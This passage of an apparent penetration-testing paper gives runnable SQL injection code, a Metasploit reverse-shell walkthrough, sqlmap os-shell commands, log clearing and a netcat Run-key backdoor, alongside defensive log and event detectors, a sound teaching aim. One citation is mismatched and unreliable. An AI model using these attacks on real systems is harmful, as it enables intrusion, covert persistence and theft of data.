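    con.execute("CREATE TABLE accounts (id INTEGER, Username TEXT, Password TEXT, "
                "Email TEXT, Role TEXT)")
    con.executemany("INSERT INTO accounts VALUES (?,?,?,?,?)", [
        (1, "admin", "s3cret", "admin@example.test", "admin"),
        (2, "marcus", "secret", "marcus@example.test", "user"),
    ])
    return con


def login_vulnerable(con, username, password):
    """The defect under discussion: user input concatenated into the SQL text."""
    sql = ("SELECT Username FROM accounts WHERE Username='" + username +
           "' AND Password='" + password + "'")
    return sorted(row[0] for row in con.execute(sql))


def login_parameterized(con, username, password):
    """Hardened form: the driver binds the values, so quotes and -- stay literal data."""
    sql = "SELECT Username FROM accounts WHERE Username=? AND Password=?"
    return sorted(row[0] for row in con.execute(sql, (username, password)))


def union_column_count(con, max_columns=10):
    """The NULL-incrementing probe: the first column count that runs without an error.

    Each attempt appends "' UNION SELECT null,...,null -- -" to the text's
    "SELECT * FROM accounts WHERE username='" prefix.  SQLite rejects a UNION
    whose two sides differ in column count, which is the error the text relies on.
    """
    for n in range(1, max_columns + 1):
        nulls = ",".join(["null"] * n)
        sql = f"SELECT * FROM accounts WHERE Username='' UNION SELECT {nulls} -- -'"
        try:
            con.execute(sql).fetchall()
            return n
        except sqlite3.OperationalError:   # "SELECTs ... do not have the same number of result columns"
            continue
    return None


def dump_via_union(con):
    """The extraction statement from the text, once the column count (5) is known."""
    injected = "' UNION SELECT null,Username,Password,null,null FROM accounts -- -"
    sql = "SELECT * FROM accounts WHERE Username='" + injected
    return sorted((row[1], row[2]) for row in con.execute(sql))


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "admin'--", "anything"))      # ['admin']: the password check is commented out
    print(login_vulnerable(db, "x", "x' OR '1'='1"))         # every account: the tautology
    print(login_parameterized(db, "admin'--", "anything"))   # []: the same input bound as data
    print(union_column_count(db))                            # 5
    print(dump_via_union(db))
```

The parameterized version is the fix a reviewer should ask for: the bound values never become part of the SQL grammar, so `admin'--` is compared literally against the Username column and matches nothing. The same three probes are what a web application firewall or log review would look for, which is why they show up again in the scanner output discussed earlier.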

These examples are a great way to start a pentest against a Windows box. The next step would be to look into command injection. It's similar to SQL injection but a little more jagged.


5 Penetration Attempt

After we have executed some reconnaissance and found vulnerabilities, we can either start brute forcing the victim's PC or use what we have and start launching attacks via Metasploit and other automated tools like SQLmap. When it comes down to this stage you have to remember there are people on pentesting teams dedicated to just the penetration part. These individuals are highly trained and usually have a background in system administration or engineering. The reason for this is that when you finally enter a victim's PC you must know how to navigate it and set up additional environmental pieces like backdoors. In addition, you also need the knowledge to disable startup processes and possibly antivirus as well. If the computer is part of a domain then it will pay off to be able to exploit that as well if it is poorly set up. For the next couple of sections I will be on Kali Linux initiating the attack. So brush up on your Linux!


5.1 Penetration Attempt

Metasploit is available on Windows and Linux. I prefer the Linux platform for its flexibility. The main purpose of Metasploit is to launch attacks on vulnerable services, although there is a plethora of tools contained within this suite. To give you an example of the functionality, Nmap is natively tied into this suite, as are some webserver hosting tools. Metasploit is the Swiss army knife when it comes to penetration testing. I will begin this section by exploiting MS10-046. Again, the format of the exploit title is given out by Microsoft: the first part is the year and the last part is a number incremented for each bulletin they publish. MS10-046 is a vulnerability in the handling of Windows shortcut files (.LNK) that can contain an icon resource pointing to a malicious DLL. The Metasploit module for this creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.

First we start the Metasploit framework by typing the following command.

msfconsole

This will start the suite and load up a modified shell. From there we type

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

This loads the module for that particular exploit. From there you are now able to set options for the payload and even the exploit. Some options may be required. To see the options type

show options

Now we will set the current payload

set payload windows/meterpreter/reverse_tcp


Meterpreter is where all the magic happens: after the payload launches, Meterpreter gives us a nice shell back to the Windows 7 box. Meterpreter uses DLL injection and communicates over a Ruby stager socket. It gives us remote command-line ability. We are going to set the options to use the local host as the hosting server for our malicious site.

set SRVHOST 192.168.1.15

set LHOST 192.168.1.15

Review your options after you are done. That's it! Now we can run the exploit by simply typing exploit. Now we social engineer our victim into either going to the following page

\\192.168.1.15\mhjs\.

Or we can get them to render the icon of this URL

http://192.168.1.15/<anything>.lnk

This will cause a Meterpreter session to be opened, giving you a shell to the box.

Meterpreter session 1 opened (192.168.1.15:4444 -> 192.168.1.13:53636)

To get to your session you type

sessions -i 1

That is all for Metasploit basics. This example is especially significant to me because social engineering pentesting combined with the direct attack methodologies of something like Metasploit makes this very potent. Most people fall victim to social engineering attacks. I will continue where we left off on this in sections 6.1 and 6.2. In the next section I am going to discuss how to use SQLmap, which is a tool that has a place in my heart for dumping databases like a champ.


5.2 Webapp penetration and database dumping

SQLmap is a fantastic tool for finding SQL injections, manipulating database queries, and dumping databases. It is the tool I use in combination with Metasploit. I will first explain what GET and POST parameters are to refresh your memory. In simpler terms, a GET request asks for data from a specific resource, and a POST request submits data to be processed by a specific resource. Both methods travel within HTTP, although GET key/value pairs are within the URL and POST's are in the data portion of the request itself. There are many other pros and cons to them, but I will exploit both for a better example. Let's start with exploitation of the GET parameter.

Finding if the SQL injection is valid (the result will be the banner if valid):

sqlmap -u "http://site.com/info.php?user=test&pass=test" -b

(Kim 70)

Retrieving the database username:

sqlmap -u "http://site.com/info.php?user=test&pass=test" --current-user

(Kim 70)

Interactive shell:

sqlmap -u "http://site.com/info.php?user=test&pass=test" --os-shell

(Kim 70)

If you are stuck with commands and you need help, you can always type sqlmap --wizard.


The -u switch specifies the target URL, if you didn't catch on. Kim states, "If you need to test an authenticated SQLmap injection finding, log into the website via a browser and grab the cookie. Then you can define it using the data=[COOKIE] switch." (Kim 70).

Next, I will move on to using the POST method.

Finding if an SQL injection is valid (the result will be in the banner if valid):

sqlmap -u http://site.com/info.php --data="user=test&pass=test" -b

(Kim 71)

Retrieving the database username:

sqlmap -u http://site.com/info.php --data="user=test&pass=test" --current-user

(Kim 71)

Interactive shell:

sqlmap -u http://site.com/info.php --data="user=test&pass=test" --os-shell

(Kim 71)

SQLmap has a collection of SQL injection techniques built in. You may specify whether you want it to use a blind injection, where the test may come out a little harder but those are more frequently caught, or even a time-based method where we send a wait command to the DB and time when the database responds back. If the response is slowed, then we have successfully used the injection. We are able to retrieve a lot out of this injection, from what was stated. The shell is considered gold if you can get it. The other option besides SQLmap is SQLninja. You would use this because it may help evade IPS signatures that would possibly detect SQLmap-based injections.
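From the defender's side, the injection strings in this section (tautologies, the `admin'--` truncation, UNION NULL probes and time-based waits) leave a recognizable trail in web server access logs, and that trail is the basis for the IPS signatures the last sentence mentions. The following is an added example, not from the paper or from SQLmap, that parses constructed combined-format log lines, URL-decodes the request (scanner payloads arrive encoded) and flags those indicators; the log lines, addresses, regexes and the two-indicator threshold are all assumptions made for the example.

```python
"""Added example, not from the paper: flag SQL injection probes in web
server access logs.  The log lines are constructed sample data in the
common log format; the regexes are deliberately narrow starting points.
"""
import re
from urllib.parse import unquote_plus

# Constructed sample: one normal user, one scanner-like client, one benign apostrophe.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2014:13:55:36 -0700] "GET /info.php?user=test&pass=test HTTP/1.1" 200 512
10.0.0.9 - - [10/Oct/2014:13:55:40 -0700] "GET /info.php?user=test%27+OR+%271%27%3D%271&pass=x HTTP/1.1" 200 9120
10.0.0.9 - - [10/Oct/2014:13:55:41 -0700] "GET /info.php?user=admin%27--&pass=x HTTP/1.1" 200 640
10.0.0.9 - - [10/Oct/2014:13:55:42 -0700] "GET /info.php?user=%27+UNION+SELECT+null%2Cnull%2Cnull%2Cnull%2Cnull+--+- HTTP/1.1" 500 210
10.0.0.9 - - [10/Oct/2014:13:55:49 -0700] "GET /info.php?user=1%27+AND+SLEEP%285%29--&pass=x HTTP/1.1" 200 512
10.0.0.7 - - [10/Oct/2014:13:56:01 -0700] "GET /search.php?q=O%27Brien HTTP/1.1" 200 1024
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Indicator patterns, applied to the URL-decoded request path plus query string.
PATTERNS = {
    "tautology": re.compile(r"'\s*or\s*'?\d+'?\s*=\s*'?\d+", re.I),      # ' OR '1'='1
    "comment_truncation": re.compile(r"'\s*(--|#)"),                     # admin'--
    "union_probe": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),     # ' UNION SELECT null,...
    "time_based": re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I),
}


def analyze_log(text):
    """Return one finding per request line that matches at least one indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                       # not a request line we understand
        decoded = unquote_plus(m["path"])  # payloads arrive URL-encoded
        hits = [name for name, rx in PATTERNS.items() if rx.search(decoded)]
        if hits:
            findings.append({"ip": m["ip"], "timestamp": m["ts"], "path": decoded,
                             "status": int(m["status"]), "indicators": hits})
    return findings


def suspicious_sources(findings, threshold=2):
    """Clients showing at least `threshold` distinct indicator types.

    A single indicator can be a false positive; several different techniques
    from one address in a short window is what an automated tool looks like.
    """
    kinds_by_ip = {}
    for f in findings:
        kinds_by_ip.setdefault(f["ip"], set()).update(f["indicators"])
    return sorted(ip for ip, kinds in kinds_by_ip.items() if len(kinds) >= threshold)


if __name__ == "__main__":
    found = analyze_log(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["status"], f["indicators"], f["path"])
    print("suspicious:", suspicious_sources(found))
```

Note that the benign `O'Brien` query is not flagged: decoding before matching and anchoring the patterns on SQL keywords, not on the apostrophe alone, is what keeps the false-positive rate tolerable. Time-based probes are the ones worth weighting highest, because a 200 response tells you nothing about whether the database actually slept.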


6 Covering Tracks and Persistence

The reason to cover your tracks when you are in a system should be common sense. When you enter a system you do not want to leave behind a digital footprint. Wilhelm gives us a reason to stay stealthy: "System administrators use similar techniques to identify malicious activity, when compared to network defenses. A system administrator can examine log files, install applications that watch for malicious software, and set up monitors on a system to see if anything inappropriate is running (such as a backdoor or brute force application) and harden their systems in such a way that any changes within essential system files are prevented and alerted upon." (Wilhelm 391).

Thomas also states, "Professional penetration testing requires stealth to avoid detection during attacks that traverse the target network, but rarely involves covering tracks while in a target system. In cases where part of the project is to determine the ability of the system administrators to detect attack, some of the techniques in this chapter can be useful." (Wilhelm 405)

There are some very basic methods for covering your tracks, like using reverse tunnels connected through proxies or using a VPN. The most common and more frequently used methods are wiping logs and hiding files. This should be routine for penetration testers, although if this little step is missed, you will have all your activity logged, whether it is in Linux or in Windows. System administrators use log files very frequently to debug and to detect, as Wilhelm mentioned. Their main duty at work is to view the logs daily, and some go to the extent of doing that every 30 minutes. So being up to date on logging activity is essential.


6.1 Keep calm…Clear the logs

If we have a session opened up by Meterpreter, clearing the logs is as simple as typing:

getsystem

clearev

Below is an example output.

CLEARING LOGS

Figure 3 – from null-byte.wonderhowto.com

Hiding files is very basic but won't necessarily help you elude virus detection and so forth. It is still used every time as good practice to hide from the victim's naked eye. Hiding a file, simply put, is done with this command:

attrib +h virus.exe

virus.exe is just an example; you may put any file you like in there.


6.2 Backdoors for Everyone!

Persistence is another thing we are concerned about when wanting to maintain current access to the box. Wilhelm states, "Our original compromise of the system may become blocked through system patching or network changes preventing us from exploiting the system whenever we need access." (Wilhelm 387). I will explain how to be persistent and set up a netcat backdoor. First we need to get a Meterpreter session like before; once we have that, we can then upload the backdoor, which is netcat, a program that writes to and reads from sockets.

upload /usr/share/windows-binaries/tools/nc.exe C:\\windows\\system32

Next we need to make netcat start up on port 443 when Windows starts. First we list the existing autorun entries in the Run key.

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

Then we add netcat into the startup process.

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'

Next we configure the computer to allow remote connections into the victim's box through port 443.

netsh advfirewall firewall add rule name="svchost service" dir=in action=allow protocol=TCP localport=443

That is it. Now, on the attacking machine, you should be able to connect to the victim from netcat with this command.

nc -v victim_ip_address port
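The activities in 6.1 and 6.2 (clearing the event logs, adding a Run-key value that launches nc.exe with `-e cmd.exe`, opening port 443 with netsh) are exactly what the administrator monitoring Wilhelm described is meant to catch, and they are cheap to alert on. The following is an added example from the defender's stance, not from the paper: it checks a constructed list of simplified Windows event records for the log-cleared events (Security event 1102, System event 104), Sysmon registry value-set events (event 13) touching the Run keys, and process-creation events (Security 4688) whose command line adds a firewall allow rule. The record format, the sample values and the regexes are assumptions made for the example; the event IDs are the documented Windows and Sysmon ones.

```python
"""Added example, not from the paper: a defender's check for the log
clearing and netcat persistence steps described in sections 6.1 and 6.2.

Event IDs: Security 1102 (audit log cleared), System 104 (log file
cleared), Sysmon 13 (registry value set), Security 4688 (process created).
The records below are constructed sample data in a simplified dict form,
not a real export.
"""
import re

# Autorun locations to watch (compared case-insensitively against the target key path).
RUN_KEYS = (
    r"software\microsoft\windows\currentversion\run",
    r"software\microsoft\windows\currentversion\runonce",
)
# A netcat binary started with "-e cmd" is a bind/reverse shell, whatever the value is named.
SHELL_RE = re.compile(r"\bnc(?:at)?(?:\.exe)?\b.*\s-e\s+cmd(?:\.exe)?", re.I)
# netsh adding an inbound allow rule; legitimate installers do this too, so it is corroborating evidence.
NETSH_RE = re.compile(r"\bnetsh\b.*\badvfirewall\b.*\badd\s+rule\b.*\baction=allow\b", re.I)

SAMPLE_EVENTS = [  # constructed
    {"channel": "Security", "event_id": 4624, "user": "WIN7\\alice", "data": {}},
    {"channel": "Security", "event_id": 1102, "user": "NT AUTHORITY\\SYSTEM", "data": {}},
    {"channel": "System", "event_id": 104, "user": "NT AUTHORITY\\SYSTEM", "data": {"Channel": "System"}},
    {"channel": "Microsoft-Windows-Sysmon/Operational", "event_id": 13, "user": "NT AUTHORITY\\SYSTEM",
     "data": {"TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\nc",
              "Details": r"C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe"}},
    {"channel": "Microsoft-Windows-Sysmon/Operational", "event_id": 13, "user": "WIN7\\alice",
     "data": {"TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive",
              "Details": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"}},
    {"channel": "Security", "event_id": 4688, "user": "NT AUTHORITY\\SYSTEM",
     "data": {"CommandLine": 'netsh advfirewall firewall add rule name="svchost service" '
                             'dir=in action=allow protocol=TCP localport=443'}},
]


def check_event(ev):
    """Return the list of alert names raised by one event (empty if benign)."""
    alerts = []
    eid, channel, data = ev["event_id"], ev["channel"], ev["data"]
    if channel == "Security" and eid == 1102:
        alerts.append("security_log_cleared")
    if channel == "System" and eid == 104:
        alerts.append("event_log_cleared")
    if "Sysmon" in channel and eid == 13:
        target = data.get("TargetObject", "").lower()
        if any(key in target for key in RUN_KEYS):
            alerts.append("run_key_modified")           # weak on its own: installers do this
            if SHELL_RE.search(data.get("Details", "")):
                alerts.append("run_key_shell_binary")   # strong: autorun value is a shell listener
    if channel == "Security" and eid == 4688 and NETSH_RE.search(data.get("CommandLine", "")):
        alerts.append("firewall_rule_added")
    return alerts


def triage(events):
    """Map each alert name to the indices of the events that raised it."""
    out = {}
    for index, ev in enumerate(events):
        for alert in check_event(ev):
            out.setdefault(alert, []).append(index)
    return out


if __name__ == "__main__":
    for alert, indices in triage(SAMPLE_EVENTS).items():
        print(f"{alert}: events {indices}")
```

Two points a practitioner would take from the output: the OneDrive autorun entry raises only the weak `run_key_modified` signal, so the Run key alone is noise until paired with what the value launches; and the 1102 event is the one `clearev` cannot avoid leaving behind, because the clearing itself is logged, so forwarding that event off the host before it can be cleared is the usual mitigation.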


Conclusion

Penetration testing is breaking into a network to document vulnerabilities; it is sometimes called a "threat and vulnerability assessment". Even though systems are complicated or poorly understood, the field has come a long way in recent years. Some of the best penetration testers that I know in the industry are self-taught and have a drive and passion to learn everything in sight. With technology continuously changing, much of their success comes not from knowledge kept but from knowledge shared, and the collaboration of knowledge is essential to every pentester. Since the breadth of knowledge in this field is massive, for some it may be best to pick a specialization and grow in that area. However, you do not need to stay specialized, and it does help to learn outside fields. The main thing to remember when in the penetration business is to keep up with current methodologies and be willing to expand your intellect on some of the more challenging aspects. I must warn that there is a spectrum of negativity around pentesting due to the ease of exploitation. The most recognizable form can be found in social engineering, which is a subfield of penetration testing. With humans, first you undermine the person and then exploit him/her when you have gained the leverage. Another example is a customer trying to use fake money at a store to see if the cashier accepts it. The underlying goal in both situations is to take advantage of someone. A penetration tester can do the same with a computer without having any human interaction. This is why some people believe penetration testing is more of a "hidden education", because the direct knowledge learned from it can be used for malicious intent. With that being said, it is wise to manage your talent, intellect, knowledge, and competitive urge and use it for a good purpose. Penetration testing is only orthodox when there is a legally binding contract. Life is about continuous learning, growing and the discovery of new things. Apply this passion to computer technology and the sky's the limit for success.


References

Gallagher, Tom, Bryan Jeffries, and Lawrence Landauer. Hunting Security Bugs. Redmond, WA: Microsoft, 2006. Print.

Kim, Peter. The Hacker Playbook: Practical Guide to Penetration Testing. North Charleston, SC: Secure Planet, LLC, 2014. Print.

Wilhelm, Thomas. Professional Penetration Testing: Creating and Operating a Formal Hacking Lab. Burlington, MA: Syngress Pub., 2010. Print.

Stuttard, Dafydd, and Marcus Pinto. The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws. Indianapolis, IN: Wiley, 2011. Print.

DeFino, Steven. Official Certified Ethical Hacker Review Guide. Boston, MA: Course Technology, Cengage Learning, 2010. Print.

Lyon, Gordon Fyodor. Nmap Network Scanning: Official Nmap Project Guide to Network Discovery and Security Scanning. Sunnyvale, CA: Insecure.Com, LLC, 2008. Print.

Chen, S., J. Xu, Z. Kalbarczyk, and K. Iyer. "Security Vulnerabilities: From Analysis to Detection and Masking Techniques." Proceedings of the IEEE 94.2 (2006): 407-18. Microsoft Research. Microsoft, Feb. 2006. Web. 5 Oct. 2014. <http://research.microsoft.com/en-us/um/people/shuochen/papers/ieee-proc.pdf>.

Kane, Brian. "INTRODUCTION." Journal of Music Theory 54.1, CAVELL'S "MUSIC DISCOMPOSED" AT 40 (2010): 1-4. WhiteHat Security. WhiteHat Security, May 2013. Web. 10/1 Oct. 2014. <https://www.whitehatsec.com/assets/WPstatsReport_052013.pdf>.


Appendix